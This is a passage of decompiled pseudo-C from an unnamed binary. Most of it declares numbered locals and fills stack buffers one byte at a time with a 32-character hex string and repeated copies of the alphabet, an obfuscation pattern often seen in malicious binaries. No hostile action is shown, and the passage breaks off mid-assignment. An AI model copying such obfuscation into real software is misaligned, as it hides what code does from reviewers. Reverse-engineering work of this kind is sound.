				short _t928;
				short _t929;
				short _t930;
				short _t931;
				short _t932;
				short _t933;
				short _t934;
				short _t935;
				short _t936;
				short _t937;
				short _t938;
				short _t939;
				short _t940;
				short _t941;
				short _t942;
				short _t943;
				short _t944;
				short _t945;
				short _t946;
				short _t947;
				short _t948;
				short _t949;
				short _t950;
				short _t951;
				short _t952;
				short _t953;
				short _t954;
				short _t955;
				short _t956;
				short _t957;
				short _t958;
				short _t959;
				short _t960;
				short _t961;
				short _t962;
				short _t963;
				short _t964;
				short _t965;
				short _t966;
				short _t967;
				short _t968;
				short _t969;
				short _t970;
				short _t971;
				short _t972;
				short _t973;
				short _t974;
				short _t975;
				short _t976;
				short _t977;
				short _t978;
				short _t979;
				short _t980;
				short _t981;
				short _t982;
				short _t983;
				short _t984;
				short _t985;
				short _t986;
				short _t987;
				short _t988;
				short _t989;
				short _t990;
				short _t991;
				short _t992;
				short _t993;
				short _t994;
				short _t995;
				short _t996;
				short _t997;
				short _t998;
				short _t999;
				short _t1000;
				short _t1001;
				short _t1002;
				short _t1003;
				short _t1004;
				short _t1005;
				short _t1006;
				short _t1007;
				short _t1008;
				short _t1009;
				short _t1010;
				short _t1011;
				short _t1012;
				short _t1013;
				short _t1014;
				short _t1015;
				short _t1016;
				short _t1017;
				short _t1018;
				short _t1019;
				short _t1020;
				short _t1021;
				short _t1022;
				short _t1023;
				short _t1024;
				short _t1025;
				short _t1026;
				short _t1027;
				short _t1028;
				short _t1029;
				short _t1030;
				short _t1031;
				short _t1032;
				short _t1033;
				short _t1034;
				short _t1035;
				short _t1036;
				short _t1037;
				short _t1038;
				short _t1039;
				short _t1040;
				short _t1041;
				short _t1042;
				short _t1043;
				short _t1044;
				short _t1045;
				short _t1046;
				short _t1047;
				short _t1048;
				short _t1049;
				short _t1050;
				short _t1051;
				short _t1052;
				short _t1053;
				short _t1054;
				short _t1055;
				short _t1056;
				short _t1057;
				short _t1058;
				short _t1059;
				short _t1060;
				short _t1061;
				short _t1062;
				short _t1063;
				short _t1064;
				short _t1065;
				short _t1066;
				short _t1067;
				short _t1068;
				short _t1069;
				short _t1070;
				short _t1071;
				short _t1072;
				short _t1073;
				short _t1074;
				short _t1075;
				short _t1076;
				short _t1077;
				short _t1078;
				short _t1079;
				short _t1080;
				short _t1081;
				short _t1082;
				short _t1083;
				short _t1084;
				short _t1085;
				short _t1086;
				short _t1087;
				short _t1088;
				short _t1089;
				short _t1090;
				short _t1091;
				short _t1092;
				short _t1093;
				short _t1094;
				short _t1095;
				short _t1096;
				short _t1097;
				short _t1098;
				short _t1099;
				short _t1100;
				short _t1101;
				short _t1102;
				short _t1103;
				short _t1104;
				short _t1105;
				short _t1106;
				short _t1107;
				short _t1108;
				short _t1109;
				short _t1110;
				short _t1111;
				short _t1112;
				short _t1113;
				short _t1114;
				short _t1115;
				short _t1116;
				short _t1117;
				short _t1118;
				short _t1119;
				short _t1120;
				short _t1121;
				short _t1122;
				short _t1123;
				short _t1124;
				short _t1125;
				short _t1126;
				short _t1127;
				short _t1128;
				short _t1129;
				short _t1130;
				short _t1131;
				short _t1132;
				short _t1133;
				short _t1134;
				short _t1135;
				short _t1136;
				short _t1137;
				short _t1138;
				short _t1139;
				short _t1140;
				short _t1141;
				short _t1142;
				short _t1143;
				short _t1144;
				short _t1145;
				short _t1146;
				short _t1147;
				short _t1148;
				short _t1149;
				short _t1150;
				short _t1151;
				short _t1152;
				short _t1153;
				short _t1154;
				short _t1155;
				short _t1156;
				short _t1157;
				short _t1158;
				short _t1159;
				short _t1160;
				short _t1161;
				short _t1163;
				short _t1164;
				short _t1165;
				short _t1166;
				short _t1167;
				short _t1168;
				short _t1169;
				short _t1170;
				short _t1171;
				short _t1172;
				short _t1173;
				short _t1174;
				short _t1175;
				short _t1176;
				short _t1177;
				short _t1178;
				short _t1179;
				short _t1180;
				short _t1181;
				short _t1182;
				short _t1183;
				short _t1184;
				short _t1185;
				short _t1186;
				short _t1187;
				short _t1188;
				short _t1189;
				short _t1190;
				short _t1191;
				short _t1192;
				short _t1193;
				short _t1194;
				short _t1195;
				short _t1196;
				short _t1197;
				short _t1198;
				short _t1199;
				short _t1200;
				short _t1201;
				short _t1202;
				short _t1203;
				short _t1204;
				short _t1205;
				short _t1206;
				short _t1207;
				short _t1208;
				short _t1209;
				short _t1210;
				short _t1211;
				short _t1212;
				short _t1213;
				short _t1214;
				short _t1215;
				short _t1216;
				short _t1217;
				short _t1218;
				short _t1219;
				short _t1220;
				short _t1221;
				short _t1222;
				short _t1223;
				short _t1224;
				short _t1225;
				short _t1226;
				short _t1227;
				short _t1228;
				short _t1229;
				short _t1230;
				short _t1231;
				short _t1232;
				short _t1233;
				short _t1234;
				short _t1235;
				short _t1236;
				short _t1237;
				short _t1238;
				short _t1239;
				short _t1240;
				short _t1241;
				short _t1242;
				short _t1243;
				short _t1244;
				short _t1245;
				short _t1246;
				short _t1247;
				short _t1248;
				short _t1249;
				short _t1250;
				short _t1251;
				short _t1252;
				short _t1253;
				short _t1254;
				short _t1255;
				short _t1256;
				short _t1257;
				short _t1258;
				short _t1259;
				short _t1260;
				short _t1261;
				short _t1262;
				short _t1263;
				short _t1264;
				short _t1265;
				short _t1266;
				short _t1267;
				short _t1268;
				short _t1269;
				short _t1270;
				short _t1271;
				short _t1272;
				short _t1273;
				short _t1274;
				short _t1275;
				short _t1276;
				short _t1277;
				short _t1278;
				short _t1279;
				short _t1280;
				short _t1281;
				short _t1282;
				short _t1283;
				short _t1284;
				short _t1285;
				short _t1286;
				short _t1287;
				short _t1288;
				short _t1289;
				short _t1290;
				short _t1291;
				short _t1292;
				short _t1293;
				short _t1294;
				short _t1295;
				short _t1296;
				short _t1297;
				short _t1298;
				short _t1299;
				short _t1300;
				short _t1301;
				short _t1302;
				short _t1303;
				short _t1304;
				short _t1305;
				short _t1306;
				short _t1307;
				short _t1308;
				short _t1309;
				short _t1310;
				short _t1311;
				short _t1312;
				short _t1313;
				short _t1314;
				short _t1315;
				short _t1316;
				short _t1317;
				short _t1318;
				short _t1319;
				short _t1320;
				short _t1321;
				short _t1322;
				short _t1323;
				short _t1324;
				short _t1325;
				short _t1326;
				short _t1327;
				short _t1328;
				short _t1329;
				short _t1330;
				short _t1331;
				short _t1332;
				short _t1333;
				short _t1334;
				short _t1335;
				short _t1336;
				short _t1337;
				short _t1338;
				short _t1339;
				short _t1340;
				short _t1341;
				short _t1342;
				short _t1343;
				short _t1344;
				short _t1345;
				short _t1346;
				short _t1347;
				short _t1348;
				short _t1349;
				short _t1350;
				short _t1351;
				short _t1352;
				short _t1353;
				short _t1354;
				short _t1355;
				short _t1356;
				short _t1357;
				short _t1358;
				short _t1359;
				short _t1360;
				short _t1361;
				short _t1362;
				short _t1363;
				short _t1364;
				short _t1365;
				short _t1366;
				short _t1367;
				short _t1368;
				short _t1369;
				short _t1370;
				short _t1371;
				short _t1372;
				short _t1373;
				short _t1374;
				short _t1375;
				short _t1376;
				short _t1377;
				short _t1378;
				short _t1379;
				short _t1380;
				short _t1381;
				short _t1382;
				short _t1383;
				short _t1384;
				short _t1385;
				short _t1386;
				short _t1387;
				short _t1388;
				short _t1389;
				short _t1390;
				short _t1391;
				short _t1392;
				short _t1393;
				short _t1394;
				short _t1395;
				short _t1396;
				short _t1397;
				short _t1398;
				short _t1399;
				short _t1400;
				short _t1401;
				short _t1402;
				short _t1403;
				short _t1404;
				short _t1405;
				short _t1406;
				short _t1407;
				short _t1408;
				short _t1409;
				short _t1410;
				short _t1411;
				short _t1412;
				short _t1413;
				short _t1414;
				short _t1415;
				short _t1416;
				short _t1417;
				short _t1418;
				short _t1419;
				short _t1420;
				short _t1421;
				short _t1422;
				short _t1423;
				short _t1424;
				short _t1425;
				short _t1426;
				short _t1428;
				short _t1429;
				short _t1430;
				short _t1431;
				short _t1432;
				short _t1433;
				short _t1434;
				short _t1435;
				short _t1436;
				short _t1437;
				short _t1438;
				short _t1439;
				short _t1440;
				short _t1441;
				short _t1442;
				short _t1443;
				short _t1444;
				short _t1445;
				short _t1446;
				short _t1447;
				short _t1448;
				short _t1449;
				short _t1450;
				short _t1451;
				short _t1452;
				short _t1453;
				short _t1454;
				short _t1455;
				short _t1456;
				short _t1457;
				short _t1458;
				short _t1459;
				short _t1460;
				short _t1461;
				short _t1462;
				short _t1463;
				short _t1464;
				short _t1465;
				short _t1466;
				short _t1467;
				short _t1468;
				short _t1469;
				short _t1470;
				short _t1471;
				short _t1472;
				short _t1473;
				short _t1474;
				short _t1475;
				short _t1476;
				short _t1477;
				short _t1478;
				short _t1479;
				short _t1480;
				short _t1481;
				short _t1482;
				short _t1483;
				short _t1484;
				short _t1485;
				short _t1486;
				short _t1487;
				short _t1488;
				short _t1489;
				short _t1490;
				short _t1491;
				short _t1492;
				short _t1493;
				short _t1494;
				short _t1495;
				short _t1496;
				short _t1497;
				short _t1498;
				short _t1499;
				short _t1500;
				short _t1501;
				short _t1502;
				short _t1503;
				short _t1504;
				short _t1505;
				short _t1506;
				short _t1507;
				short _t1508;
				short _t1509;
				short _t1510;
				short _t1511;
				short _t1512;
				short _t1513;
				short _t1514;
				short _t1515;
				short _t1516;
				short _t1517;
				short _t1518;
				short _t1519;
				short _t1520;
				short _t1521;
				short _t1522;
				short _t1523;
				short _t1524;
				short _t1525;
				short _t1526;
				short _t1527;
				short _t1528;
				short _t1529;
				short _t1530;
				short _t1531;
				short _t1532;
				short _t1533;
				short _t1534;
				short _t1535;
				short _t1536;
				short _t1537;
				short _t1538;
				short _t1539;
				short _t1540;
				short _t1541;
				short _t1542;
				short _t1543;
				short _t1544;
				short _t1545;
				short _t1546;
				short _t1547;
				short _t1548;
				short _t1549;
				short _t1550;
				short _t1551;
				short _t1552;
				short _t1553;
				short _t1554;
				short _t1555;
				short _t1556;
				short _t1557;
				short _t1558;
				short _t1559;
				short _t1560;
				short _t1561;
				short _t1562;
				short _t1563;
				short _t1564;
				short _t1565;
				short _t1566;
				short _t1567;
				short _t1568;
				short _t1569;
				short _t1570;
				short _t1571;
				short _t1572;
				short _t1573;
				short _t1574;
				short _t1575;
				short _t1576;
				short _t1577;
				short _t1578;
				short _t1579;
				short _t1580;
				short _t1581;
				short _t1582;
				short _t1583;
				short _t1584;
				short _t1585;
				short _t1586;
				short _t1587;
				short _t1588;
				short _t1589;
				short _t1590;
				short _t1591;
				short _t1592;
				short _t1593;
				short _t1594;
				short _t1595;
				short _t1596;
				short _t1597;
				short _t1598;
				short _t1599;
				short _t1600;
				short _t1601;
				short _t1602;
				short _t1603;
				short _t1604;
				short _t1605;
				short _t1606;
				short _t1607;
				short _t1608;
				short _t1609;
				short _t1610;
				short _t1611;
				short _t1612;
				short _t1613;
				short _t1614;
				short _t1615;
				short _t1616;
				short _t1617;
				short _t1618;
				short _t1619;
				short _t1620;
				short _t1621;
				short _t1622;
				short _t1623;
				short _t1624;
				short _t1625;
				short _t1626;
				short _t1627;
				short _t1628;
				short _t1629;
				short _t1630;
				short _t1631;
				short _t1632;
				short _t1633;
				short _t1634;
				short _t1635;
				short _t1636;
				short _t1637;
				short _t1638;
				short _t1639;
				short _t1640;
				short _t1641;
				short _t1642;
				short _t1643;
				short _t1644;
				short _t1645;
				short _t1646;
				short _t1647;
				short _t1648;
				short _t1649;
				short _t1650;
				short _t1651;
				short _t1652;
				short _t1653;
				short _t1654;
				short _t1655;
				short _t1656;
				short _t1657;
				short _t1658;
				short _t1659;
				short _t1660;
				short _t1661;
				short _t1662;
				short _t1663;
				short _t1664;
				short _t1665;
				short _t1666;
				short _t1667;
				short _t1668;
				short _t1669;
				short _t1670;
				short _t1671;
				short _t1672;
				short _t1673;
				short _t1674;
				short _t1675;
				short _t1676;
				short _t1677;
				short _t1678;
				short _t1679;
				short _t1680;
				short _t1681;
				short _t1682;
				short _t1683;
				short _t1684;
				short _t1685;
				short _t1686;
				short _t1687;
				signed int _t1701;
				void* _t1703;
				void* _t1711;
				signed int _t1712;
				void* _t1713;
				int _t1715;
				int _t1718;
				signed int _t1728;
				void* _t1730;
				signed int _t1731;
				void* _t1733;
				signed int _t1734;
				void* _t1736;
				void* _t1737;
				void* _t1738;
				void* _t1739;
				void* _t1740;

				_t1740 = __eflags;
				_t1738 = __edx;
				_t1737 = __ecx;
				_v20 = _v20 & 0x00000000;
				_v1664 = _v1664 & 0x00000000;
				_v56 = 0x63;
				_v55 = 0x37;
				_v54 = 0x37;
				_v53 = 0x30;
				_v52 = 0x38;
				_v51 = 0x31;
				_v50 = 0x32;
				_v49 = 0x36;
				_v48 = 0x38;
				_v47 = 0x31;
				_v46 = 0x31;
				_v45 = 0x34;
				_v44 = 0x34;
				_v43 = 0x39;
				_v42 = 0x35;
				_v41 = 0x30;
				_v40 = 0x39;
				_v39 = 0x61;
				_v38 = 0x34;
				_v37 = 0x61;
				_v36 = 0x61;
				_v35 = 0x33;
				_v34 = 0x30;
				_v33 = 0x63;
				_v32 = 0x65;
				_v31 = 0x62;
				_v30 = 0x31;
				_v29 = 0x37;
				_v28 = 0x30;
				_v27 = 0x39;
				_v26 = 0x33;
				_v25 = 0x32;
				_v24 = 0;
				_v16 = _v16 & 0x00000000;
				_v1696 = _v1696 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_t902 = 0x61;
				_v1112 = _t902;
				_t903 = 0x62;
				_v1110 = _t903;
				_t904 = 0x63;
				_v1108 = _t904;
				_t905 = 0x64;
				_v1106 = _t905;
				_t906 = 0x65;
				_v1104 = _t906;
				_t907 = 0x66;
				_v1102 = _t907;
				_t908 = 0x67;
				_v1100 = _t908;
				_t909 = 0x68;
				_v1098 = _t909;
				_t910 = 0x69;
				_v1096 = _t910;
				_t911 = 0x6a;
				_v1094 = _t911;
				_t912 = 0x6b;
				_v1092 = _t912;
				_t913 = 0x6c;
				_v1090 = _t913;
				_t914 = 0x6d;
				_v1088 = _t914;
				_t915 = 0x6e;
				_v1086 = _t915;
				_t916 = 0x6f;
				_v1084 = _t916;
				_t917 = 0x70;
				_v1082 = _t917;
				_t918 = 0x71;
				_v1080 = _t918;
				_t919 = 0x72;
				_v1078 = _t919;
				_t920 = 0x73;
				_v1076 = _t920;
				_t921 = 0x74;
				_v1074 = _t921;
				_t922 = 0x75;
				_v1072 = _t922;
				_t923 = 0x76;
				_v1070 = _t923;
				_t924 = 0x77;
				_v1068 = _t924;
				_t925 = 0x78;
				_v1066 = _t925;
				_t926 = 0x79;
				_v1064 = _t926;
				_t927 = 0x7a;
				_v1062 = _t927;
				_t928 = 0x61;
				_v1060 = _t928;
				_t929 = 0x62;
				_v1058 = _t929;
				_t930 = 0x63;
				_v1056 = _t930;
				_t931 = 0x64;
				_v1054 = _t931;
				_t932 = 0x65;
				_v1052 = _t932;
				_t933 = 0x66;
				_v1050 = _t933;
				_t934 = 0x67;
				_v1048 = _t934;
				_t935 = 0x68;
				_v1046 = _t935;
				_t936 = 0x69;
				_v1044 = _t936;
				_t937 = 0x6a;
				_v1042 = _t937;
				_t938 = 0x6b;
				_v1040 = _t938;
				_t939 = 0x6c;
				_v1038 = _t939;
				_t940 = 0x6d;
				_v1036 = _t940;
				_t941 = 0x6e;
				_v1034 = _t941;
				_t942 = 0x6f;
				_v1032 = _t942;
				_t943 = 0x70;
				_v1030 = _t943;
				_t944 = 0x71;
				_v1028 = _t944;
				_t945 = 0x72;
				_v1026 = _t945;
				_t946 = 0x73;
				_v1024 = _t946;
				_t947 = 0x74;
				_v1022 = _t947;
				_t948 = 0x75;
				_v1020 = _t948;
				_t949 = 0x76;
				_v1018 = _t949;
				_t950 = 0x77;
				_v1016 = _t950;
				_t951 = 0x78;
				_v1014 = _t951;
				_t952 = 0x79;
				_v1012 = _t952;
				_t953 = 0x7a;
				_v1010 = _t953;
				_t954 = 0x61;
				_v1008 = _t954;
				_t955 = 0x62;
				_v1006 = _t955;
				_t956 = 0x63;
				_v1004 = _t956;
				_t957 = 0x64;
				_v1002 = _t957;
				_t958 = 0x65;
				_v1000 = _t958;
				_t959 = 0x66;
				_v998 = _t959;
				_t960 = 0x67;
				_v996 = _t960;
				_t961 = 0x68;
				_v994 = _t961;
				_t962 = 0x69;
				_v992 = _t962;
				_t963 = 0x6a;
				_v990 = _t963;
				_t964 = 0x6b;
				_v988 = _t964;
				_t965 = 0x6c;
				_v986 = _t965;
				_t966 = 0x6d;
				_v984 = _t966;
				_t967 = 0x6e;
				_v982 = _t967;
				_t968 = 0x6f;
				_v980 = _t968;
				_t969 = 0x70;
				_v978 = _t969;
				_t970 = 0x71;
				_v976 = _t970;
				_t971 = 0x72;
				_v974 = _t971;
				_t972 = 0x73;
				_v972 = _t972;
				_t973 = 0x74;
				_v970 = _t973;
				_t974 = 0x75;
				_v968 = _t974;
				_t975 = 0x76;
				_v966 = _t975;
				_t976 = 0x77;
				_v964 = _t976;
				_t977 = 0x78;
				_v962 = _t977;
				_t978 = 0x79;
				_v960 = _t978;
				_t979 = 0x7a;
				_v958 = _t979;
				_t980 = 0x61;
				_v956 = _t980;
				_t981 = 0x62;
				_v954 = _t981;
				_t982 = 0x63;
				_v952 = _t982;
				_t983 = 0x64;
				_v950 = _t983;
				_t984 = 0x65;
				_v948 = _t984;
				_t985 = 0x66;
				_v946 = _t985;
				_t986 = 0x67;
				_v944 = _t986;
				_t987 = 0x68;
				_v942 = _t987;
				_t988 = 0x69;
				_v940 = _t988;
				_t989 = 0x6a;
				_v938 = _t989;
				_t990 = 0x6b;
				_v936 = _t990;
				_t991 = 0x6c;
				_v934 = _t991;
				_t992 = 0x6d;
				_v932 = _t992;
				_t993 = 0x6e;
				_v930 = _t993;
				_t994 = 0x6f;
				_v928 = _t994;
				_t995 = 0x70;
				_v926 = _t995;
				_t996 = 0x71;
				_v924 = _t996;
				_t997 = 0x72;
				_v922 = _t997;
				_t998 = 0x73;
				_v920 = _t998;
				_t999 = 0x74;
				_v918 = _t999;
				_t1000 = 0x75;
				_v916 = _t1000;
				_t1001 = 0x76;
				_v914 = _t1001;
				_t1002 = 0x77;
				_v912 = _t1002;
				_t1003 = 0x78;
				_v910 = _t1003;
				_t1004 = 0x79;
				_v908 = _t1004;
				_t1005 = 0x7a;
				_v906 = _t1005;
				_t1006 = 0x61;
				_v904 = _t1006;
				_t1007 = 0x62;
				_v902 = _t1007;
				_t1008 = 0x63;
				_v900 = _t1008;
				_t1009 = 0x64;
				_v898 = _t1009;
				_t1010 = 0x65;
				_v896 = _t1010;
				_t1011 = 0x66;
				_v894 = _t1011;
				_t1012 = 0x67;
				_v892 = _t1012;
				_t1013 = 0x68;
				_v890 = _t1013;
				_t1014 = 0x69;
				_v888 = _t1014;
				_t1015 = 0x6a;
				_v886 = _t1015;
				_t1016 = 0x6b;
				_v884 = _t1016;
				_t1017 = 0x6c;
				_v882 = _t1017;
				_t1018 = 0x6d;
				_v880 = _t1018;
				_t1019 = 0x6e;
				_v878 = _t1019;
				_t1020 = 0x6f;
				_v876 = _t1020;
				_t1021 = 0x70;
				_v874 = _t1021;
				_t1022 = 0x71;
				_v872 = _t1022;
				_t1023 = 0x72;
				_v870 = _t1023;
				_t1024 = 0x73;
				_v868 = _t1024;
				_t1025 = 0x74;
				_v866 = _t1025;
				_t1026 = 0x75;
				_v864 = _t1026;
				_t1027 = 0x76;
				_v862 = _t1027;
				_t1028 = 0x77;
				_v860 = _t1028;
				_t1029 = 0x78;
				_v858 = _t1029;
				_t1030 = 0x79;
				_v856 = _t1030;
				_t1031 = 0x7a;
				_v854 = _t1031;
				_t1032 = 0x61;
				_v852 = _t1032;
				_t1033 = 0x62;
				_v850 = _t1033;
				_t1034 = 0x63;
				_v848 = _t1034;
				_t1035 = 0x64;
				_v846 = _t1035;
				_t1036 = 0x65;
				_v844 = _t1036;
				_t1037 = 0x66;
				_v842 = _t1037;
				_t1038 = 0x67;
				_v840 = _t1038;
				_t1039 = 0x68;
				_v838 = _t1039;
				_t1040 = 0x69;
				_v836 = _t1040;
				_t1041 = 0x6a;
				_v834 = _t1041;
				_t1042 = 0x6b;
				_v832 = _t1042;
				_t1043 = 0x6c;
				_v830 = _t1043;
				_t1044 = 0x6d;
				_v828 = _t1044;
				_t1045 = 0x6e;
				_v826 = _t1045;
				_t1046 = 0x6f;
				_v824 = _t1046;
				_t1047 = 0x70;
				_v822 = _t1047;
				_t1048 = 0x71;
				_v820 = _t1048;
				_t1049 = 0x72;
				_v818 = _t1049;
				_t1050 = 0x73;
				_v816 = _t1050;
				_t1051 = 0x74;
				_v814 = _t1051;
				_t1052 = 0x75;
				_v812 = _t1052;
				_t1053 = 0x76;
				_v810 = _t1053;
				_t1054 = 0x77;
				_v808 = _t1054;
				_t1055 = 0x78;
				_v806 = _t1055;
				_t1056 = 0x79;
				_v804 = _t1056;
				_t1057 = 0x7a;
				_v802 = _t1057;
				_t1058 = 0x61;
				_v800 = _t1058;
				_t1059 = 0x62;
				_v798 = _t1059;
				_t1060 = 0x63;
				_v796 = _t1060;
				_t1061 = 0x64;
				_v794 = _t1061;
				_t1062 = 0x65;
				_v792 = _t1062;
				_t1063 = 0x66;
				_v790 = _t1063;
				_t1064 = 0x67;
				_v788 = _t1064;
				_t1065 = 0x68;
				_v786 = _t1065;
				_t1066 = 0x69;
				_v784 = _t1066;
				_t1067 = 0x6a;
				_v782 = _t1067;
				_t1068 = 0x6b;
				_v780 = _t1068;
				_t1069 = 0x6c;
				_v778 = _t1069;
				_t1070 = 0x6d;
				_v776 = _t1070;
				_t1071 = 0x6e;
				_v774 = _t1071;
				_t1072 = 0x6f;
				_v772 = _t1072;
				_t1073 = 0x70;
				_v770 = _t1073;
				_t1074 = 0x71;
				_v768 = _t1074;
				_t1075 = 0x72;
				_v766 = _t1075;
				_t1076 = 0x73;
				_v764 = _t1076;
				_t1077 = 0x74;
				_v762 = _t1077;
				_t1078 = 0x75;
				_v760 = _t1078;
				_t1079 = 0x76;
				_v758 = _t1079;
				_t1080 = 0x77;
				_v756 = _t1080;
				_t1081 = 0x78;
				_v754 = _t1081;
				_t1082 = 0x79;
				_v752 = _t1082;
				_t1083 = 0x7a;
				_v750 = _t1083;
				_t1084 = 0x61;
				_v748 = _t1084;
				_t1085 = 0x62;
				_v746 = _t1085;
				_t1086 = 0x63;
				_v744 = _t1086;
				_t1087 = 0x64;
				_v742 = _t1087;
				_t1088 = 0x65;
				_v740 = _t1088;
				_t1089 = 0x66;
				_v738 = _t1089;
				_t1090 = 0x67;
				_v736 = _t1090;
				_t1091 = 0x68;
				_v734 = _t1091;
				_t1092 = 0x69;
				_v732 = _t1092;
				_t1093 = 0x6a;
				_v730 = _t1093;
				_t1094 = 0x6b;
				_v728 = _t1094;
				_t1095 = 0x6c;
				_v726 = _t1095;
				_t1096 = 0x6d;
				_v724 = _t1096;
				_t1097 = 0x6e;
				_v722 = _t1097;
				_t1098 = 0x6f;
				_v720 = _t1098;
				_t1099 = 0x70;
				_v718 = _t1099;
				_t1100 = 0x71;
				_v716 = _t1100;
				_t1101 = 0x72;
				_v714 = _t1101;
				_t1102 = 0x73;
				_v712 = _t1102;
				_t1103 = 0x74;
				_v710 = _t1103;
				_t1104 = 0x75;
				_v708 = _t1104;
				_t1105 = 0x76;
				_v706 = _t1105;
				_t1106 = 0x77;
				_v704 = _t1106;
				_t1107 = 0x78;
				_v702 = _t1107;
				_t1108 = 0x79;
				_v700 = _t1108;
				_t1109 = 0x7a;
				_v698 = _t1109;
				_t1110 = 0x61;
				_v696 = _t1110;
				_t1111 = 0x62;
				_v694 = _t1111;
				_t1112 = 0x63;
				_v692 = _t1112;
				_t1113 = 0x64;
				_v690 = _t1113;
				_t1114 = 0x65;
				_v688 = _t1114;
				_t1115 = 0x66;
				_v686 = _t1115;
				_t1116 = 0x67;
				_v684 = _t1116;
				_t1117 = 0x68;
				_v682 = _t1117;
				_t1118 = 0x69;
				_v680 = _t1118;
				_t1119 = 0x6a;
				_v678 = _t1119;
				_t1120 = 0x6b;
				_v676 = _t1120;
				_t1121 = 0x6c;
				_v674 = _t1121;
				_t1122 = 0x6d;
				_v672 = _t1122;
				_t1123 = 0x6e;
				_v670 = _t1123;
				_t1124 = 0x6f;
				_v668 = _t1124;
				_t1125 = 0x70;
				_v666 = _t1125;
				_t1126 = 0x71;
				_v664 = _t1126;
				_t1127 = 0x72;
				_v662 = _t1127;
				_t1128 = 0x73;
				_v660 = _t1128;
				_t1129 = 0x74;
				_v658 = _t1129;
				_t1130 = 0x75;
				_v656 = _t1130;
				_t1131 = 0x76;
				_v654 = _t1131;
				_t1132 = 0x77;
				_v652 = _t1132;
				_t1133 = 0x78;
				_v650 = _t1133;
				_t1134 = 0x79;
				_v648 = _t1134;
				_t1135 = 0x7a;
				_v646 = _t1135;
				_t1136 = 0x61;
				_v644 = _t1136;
				_t1137 = 0x62;
				_v642 = _t1137;
				_t1138 = 0x63;
				_v640 = _t1138;
				_t1139 = 0x64;
				_v638 = _t1139;
				_t1140 = 0x65;
				_v636 = _t1140;
				_t1141 = 0x66;
				_v634 = _t1141;
				_t1142 = 0x67;
				_v632 = _t1142;
				_t1143 = 0x68;
				_v630 = _t1143;
				_t1144 = 0x69;
				_v628 = _t1144;
				_t1145 = 0x6a;
				_v626 = _t1145;
				_t1146 = 0x6b;
				_v624 = _t1146;
				_t1147 = 0x6c;
				_v622 = _t1147;
				_t1148 = 0x6d;
				_v620 = _t1148;
				_t1149 = 0x6e;
				_v618 = _t1149;
				_t1150 = 0x6f;
				_v616 = _t1150;
				_t1151 = 0x70;
				_v614 = _t1151;
				_t1152 = 0x71;
				_v612 = _t1152;
				_t1153 = 0x72;
				_v610 = _t1153;
				_t1154 = 0x73;
				_v608 = _t1154;
				_t1155 = 0x74;
				_v606 = _t1155;
				_t1156 = 0x75;
				_v604 = _t1156;
				_t1157 = 0x76;
				_v602 = _t1157;
				_t1158 = 0x77;
				_v600 = _t1158;
				_t1159 = 0x78;
				_v598 = _t1159;
				_t1160 = 0x79;
				_v596 = _t1160;
				_t1161 = 0x7a;
				_v594 = _t1161;
				_v592 = 0;
				_t1163 = 0x61;
				_v1644 = _t1163;
				_t1164 = 0x62;
				_v1642 = _t1164;
				_t1165 = 0x63;
				_v1640 = _t1165;
				_t1166 = 0x64;
				_v1638 = _t1166;
				_t1167 = 0x65;
				_v1636 = _t1167;
				_t1168 = 0x66;
				_v1634 = _t1168;
				_t1169 = 0x67;
				_v1632 = _t1169;
				_t1170 = 0x68;
				_v1630 = _t1170;
				_t1171 = 0x69;
				_v1628 = _t1171;
				_t1172 = 0x6a;
				_v1626 = _t1172;
				_t1173 = 0x6b;
				_v1624 = _t1173;
				_t1174 = 0x6c;
				_v1622 = _t1174;
				_t1175 = 0x6d;
				_v1620 = _t1175;
				_t1176 = 0x6e;
				_v1618 = _t1176;
				_t1177 = 0x6f;
				_v1616 = _t1177;
				_t1178 = 0x70;
				_v1614 = _t1178;
				_t1179 = 0x71;
				_v1612 = _t1179;
				_t1180 = 0x72;
				_v1610 = _t1180;
				_t1181 = 0x73;
				_v1608 = _t1181;
				_t1182 = 0x74;
				_v1606 = _t1182;
				_t1183 = 0x75;
				_v1604 = _t1183;
				_t1184 = 0x76;
				_v1602 = _t1184;
				_t1185 = 0x77;
				_v1600 = _t1185;
				_t1186 = 0x78;
				_v1598 = _t1186;
				_t1187 = 0x79;
				_v1596 = _t1187;
				_t1188 = 0x7a;
				_v1594 = _t1188;
				_t1189 = 0x61;
				_v1592 = _t1189;
				_t1190 = 0x62;
				_v1590 = _t1190;
				_t1191 = 0x63;
				_v1588 = _t1191;
				_t1192 = 0x64;
				_v1586 = _t1192;
				_t1193 = 0x65;
				_v1584 = _t1193;
				_t1194 = 0x66;
				_v1582 = _t1194;
				_t1195 = 0x67;
				_v1580 = _t1195;
				_t1196 = 0x68;
				_v1578 = _t1196;
				_t1197 = 0x69;
				_v1576 = _t1197;
				_t1198 = 0x6a;
				_v1574 = _t1198;
				_t1199 = 0x6b;
				_v1572 = _t1199;
				_t1200 = 0x6c;
				_v1570 = _t1200;
				_t1201 = 0x6d;
				_v1568 = _t1201;
				_t1202 = 0x6e;
				_v1566 = _t1202;
				_t1203 = 0x6f;
				_v1564 = _t1203;
				_t1204 = 0x70;
				_v1562 = _t1204;
				_t1205 = 0x71;
				_v1560 = _t1205;
				_t1206 = 0x72;
				_v1558 = _t1206;
				_t1207 = 0x73;
				_v1556 = _t1207;
				_t1208 = 0x74;
				_v1554 = _t1208;
				_t1209 = 0x75;
				_v1552 = _t1209;
				_t1210 = 0x76;
				_v1550 = _t1210;
				_t1211 = 0x77;
				_v1548 = _t1211;
				_t1212 = 0x78;
				_v1546 = _t1212;
				_t1213 = 0x79;
				_v1544 = _t1213;
				_t1214 = 0x7a;
				_v1542 = _t1214;
				_t1215 = 0x61;
				_v1540 = _t1215;
				_t1216 = 0x62;
				_v1538 = _t1216;
				_t1217 = 0x63;
				_v1536 = _t1217;
				_t1218 = 0x64;
				_v1534 = _t1218;
				_t1219 = 0x65;
				_v1532 = _t1219;
				_t1220 = 0x66;
				_v1530 = _t1220;
				_t1221 = 0x67;
				_v1528 = _t1221;
				_t1222 = 0x68;
				_v1526 = _t1222;
				_t1223 = 0x69;
				_v1524 = _t1223;
				_t1224 = 0x6a;
				_v1522 = _t1224;
				_t1225 = 0x6b;
				_v1520 = _t1225;
				_t1226 = 0x6c;
				_v1518 = _t1226;
				_t1227 = 0x6d;
				_v1516 = _t1227;
				_t1228 = 0x6e;
				_v1514 = _t1228;
				_t1229 = 0x6f;
				_v1512 = _t1229;
				_t1230 = 0x70;
				_v1510 = _t1230;
				_t1231 = 0x71;
				_v1508 = _t1231;
				_t1232 = 0x72;
				_v1506 = _t1232;
				_t1233 = 0x73;
				_v1504 = _t1233;
				_t1234 = 0x74;
